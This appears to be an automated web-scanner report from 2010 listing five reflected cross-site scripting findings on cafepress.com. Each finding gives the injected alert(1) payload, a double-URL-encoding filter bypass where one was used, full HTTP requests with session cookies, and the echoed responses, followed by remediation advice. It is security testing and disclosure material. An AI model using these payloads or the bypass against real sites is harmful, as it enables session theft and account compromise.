cafepress.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ebb4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6f6b5b741 was submitted in the REST URL parameter 1. This input was echoed as 2ebb4</script><script>alert(1)</script>df6f6b5b741 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,2990075362ebb4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6f6b5b741?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
ntCoent-Length: 43454
Date: Sun, 26 Dec 2010 13:47:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054713%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:47:13 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054713%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:47:13 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 43454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
afepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/error404.aspx?404;http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,2990075362ebb4</script><script>alert(1)</script>df6f6b5b741'
window.cafepress.tealeaf.searchTerm = ''
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress
...[SNIP]...

1.2. http://www.cafepress.com/ [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc0ca"-alert(1)-"bbefee824fc was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAcc0ca"-alert(1)-"bbefee824fc; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 75201
Date: Sun, 26 Dec 2010 13:46:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAcc0ca"-alert(1)-"bbefee824fc";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.3. http://www.cafepress.com/ [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adbea</script><script>alert(1)</script>c2b3851b0e4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=adbea</script><script>alert(1)</script>c2b3851b0e4; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 75223
Date: Sun, 26 Dec 2010 13:46:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
n_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'HomePage'
window.cafepress.tealeaf.searchTerm = 'adbea</script><script>alert(1)</script>c2b3851b0e4'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.4. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e15e"-alert(1)-"05104e4ef1f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA1e15e"-alert(1)-"05104e4ef1f; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 93201
Date: Sun, 26 Dec 2010 13:46:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA1e15e"-alert(1)-"05104e4ef1f";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.5. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2434e</script><script>alert(1)</script>da77cba4a3a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=2434e</script><script>alert(1)</script>da77cba4a3a; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
Cteonnt-Length: 93261
Date: Sun, 26 Dec 2010 13:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=49f12%00%0d%0a462543dabee; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:51 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:51 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
